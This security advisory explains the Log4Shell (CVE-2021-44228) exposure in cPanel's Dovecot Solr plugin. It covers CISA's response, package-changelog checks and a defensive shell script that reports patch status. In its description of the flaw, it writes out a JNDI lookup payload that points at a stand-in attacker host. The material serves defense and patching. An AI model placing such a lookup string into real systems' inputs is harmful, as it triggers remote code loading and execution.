cPanel Plugin Contains Log4j Vulnerability
cPanel, one of the most widely used web hosting control panels, recently released a patch for a flaw in the Log4j Java library that ships with one of its plugins. The vulnerability, tracked as CVE-2021-44228 and known as Log4Shell, has been described by researchers as catastrophic.
Does Log4j (CVE-2021-44228) affect cPanel?
Yes. The cPanel Dovecot Solr plugin bundles Log4j and is affected. If you do not need full-text IMAP search, uninstall the plugin; otherwise update the cpanel-dovecot-solr RPM to version 8.8.2-4 or later, which cPanel has released to mitigate CVE-2021-44228.
“We strongly advise all WordPress site customers running WordPress sites with IMAP messaging protocol to confirm they are running the latest version which patches this vulnerability.”
Log4j Critical Log4Shell Vulnerability
Log4j is a Java logging library that is embedded, as a drop-in dependency, in a large number of Java applications and services. In cPanel it arrives inside the cPanel Dovecot Solr plugin, which provides full-text search for IMAP mailboxes using Apache Solr. It is not something an administrator downloads and uses directly; it is pulled in by the plugin. Note that the plugin is optional: IMAP itself does not depend on it, only the full-text search feature does, so a server that never installed the plugin is not exposed through this path.
Log4Shell carries a CVSS v3 base score of 10.0, the maximum on the 0 to 10 scale. The flaw is in Log4j's message lookup feature: when a logged string contains a JNDI lookup such as ${jndi:ldap://attacker-host/a}, vulnerable Log4j 2.x versions resolve it, contact the attacker's server, and can load and execute attacker-supplied code without any authentication. Any attacker-controlled input that ends up in a log line is a potential entry point. Note also that the fix in Log4j 2.15.0 was later found to be incomplete (CVE-2021-45046) and further releases followed, so follow your vendor's current guidance rather than stopping at 2.15.0.
cPanel describes the plugin as:
“The cPanel Solr plugin enables Internet Message Access Protocol (IMAP) full-text search (FTS) indexing (powered by Apache Solr ™), which provides fast search capabilities for IMAP mailboxes.”
cPanel Web Host Control Panel
cPanel is one of the most widely used web hosting control panels. It allows business owners and developers to manage their website hosting environment without working directly on the command line.
cPanel presents a graphical user interface (GUI) over the underlying Linux server, in much the same way a desktop environment sits over a command prompt. Even non-technical users can perform tasks such as updating the PHP version, checking firewall settings, and adding SSL certificates.
According to research by BuiltWith, more than 3 million sites use cPanel to manage their hosting.
United States Government Statement on Log4Shell Vulnerability
The US Cybersecurity and Infrastructure Security Agency (CISA) published a statement on December 11, 2021, urging software developers and vendors to patch the Log4j library in their products and to inform their customers.
The Director of CISA, Jen Easterly, wrote:
“CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library.”
End users depend almost entirely on their software vendors here, so it falls to the vendors to identify affected products, mitigate and patch them, and keep their customers informed.
The statement notes that the Joint Cyber Defense Collaborative, the National Security Agency, and the FBI are also working in coordination to raise awareness and to drive mitigation proactively.
The statement continues:
“We continue to urge all organizations to review the latest CISA current activity alert and upgrade to log4j version 2.15.0 or apply their appropriate vendor recommended mitigations immediately.
To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between the government and the private sector. We urge all organizations to join us in this essential effort and take action.”
Mitigation Process for CVE-2021-44228
cPanel announced on its discussion forum that the cPanel Dovecot Solr plugin bundles the Log4j library and that this is a security risk. First check whether the package is installed at all:
# rpm -q cpanel-dovecot-solr
If it is installed, check whether the build you have includes the fix. cPanel's updated package records CVE-2021-44228 in its changelog, so a match from the following command (RPM-based systems) means the mitigated build is in place, and no output means you should update or remove the plugin:
# rpm -q cpanel-dovecot-solr --changelog | grep CVE-2021-44228
On Ubuntu, where cPanel ships Debian packages, the equivalent check reads the package changelog instead:
# zgrep -E CVE-2021-44228 /usr/share/doc/cpanel-dovecot-solr/changelog.Debian.gz
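The checks above combined into a single script that reports one of four states, as an added example that is not cPanel's own tooling. It assumes the package name cpanel-dovecot-solr, the fixed version-release 8.8.2-4 named in this article, and the changelog locations used by the commands above; the sample changelog entries used for the self-check at the bottom are constructed for illustration and are not real cPanel changelogs.

```shell
#!/bin/sh
# check_cpanel_solr.sh - report the Log4Shell exposure of the cPanel Dovecot Solr plugin.
# Added example, not cPanel's tooling. Assumptions: package name cpanel-dovecot-solr,
# fixed version-release 8.8.2-4 (as stated in the article), and the changelog
# locations used by the article's own commands.

PKG="cpanel-dovecot-solr"
CVE="CVE-2021-44228"
FIXED="8.8.2-4"

# version_ge A B: succeed when dotted/dashed version-release A is >= B,
# comparing component by component numerically (missing components count as 0).
version_ge() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, /[.-]/); m = split(b, y, /[.-]/)
    k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      xi = (i in x) ? x[i] + 0 : 0
      yi = (i in y) ? y[i] + 0 : 0
      if (xi > yi) exit 0
      if (xi < yi) exit 1
    }
    exit 0
  }'
}

# classify VERSION CHANGELOG: "patched" when the installed version is at or past the
# fixed one, or when the changelog names the CVE (the article's grep test);
# otherwise "vulnerable".
classify() {
  if version_ge "$1" "$FIXED"; then
    echo patched
  elif printf '%s\n' "$2" | grep -q "$CVE"; then
    echo patched
  else
    echo vulnerable
  fi
}

# solr_status [PKG]: query the live system. Prints not-installed, patched,
# vulnerable, or unknown (no supported package manager found).
solr_status() {
  pkg="${1:-$PKG}"
  if command -v rpm >/dev/null 2>&1 && rpm -q "$pkg" >/dev/null 2>&1; then
    classify "$(rpm -q "$pkg" --qf '%{VERSION}-%{RELEASE}\n')" "$(rpm -q "$pkg" --changelog)"
  elif command -v dpkg-query >/dev/null 2>&1 && dpkg-query -W "$pkg" >/dev/null 2>&1; then
    classify "$(dpkg-query -W -f='${Version}\n' "$pkg")" \
             "$(zcat "/usr/share/doc/$pkg/changelog.Debian.gz" 2>/dev/null)"
  elif command -v rpm >/dev/null 2>&1 || command -v dpkg-query >/dev/null 2>&1; then
    echo not-installed
  else
    echo unknown
  fi
}

# Constructed sample changelog entries (not real cPanel changelogs) to exercise classify.
OLD_LOG='* 8.8.2-3
- Rebuild against current Dovecot'
NEW_LOG='* 8.8.2-4
- Mitigate CVE-2021-44228 in bundled log4j'

# self_check: the classifications a reader should expect from the samples above.
self_check() {
  [ "$(classify 8.8.2-3 "$OLD_LOG")" = vulnerable ] &&
  [ "$(classify 8.8.2-3 "$NEW_LOG")" = patched ] &&
  [ "$(classify 8.8.2-4 "$OLD_LOG")" = patched ] &&
  [ "$(classify 8.9.0-1 "$OLD_LOG")" = patched ]
}

self_check && echo "self-check ok"
echo "$PKG: $(solr_status)"
```

Run it as root on the cPanel host. A result of vulnerable means update to 8.8.2-4 or later or remove the plugin; not-installed means this particular exposure path does not apply to the server. The changelog grep mirrors cPanel's own check, and the version comparison is a second signal for the case where the changelog is missing or was trimmed.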
For more detailed information, see our recent announcement about the Log4j vulnerability.
Patch as soon as possible, and share your feedback or questions in the comment section below.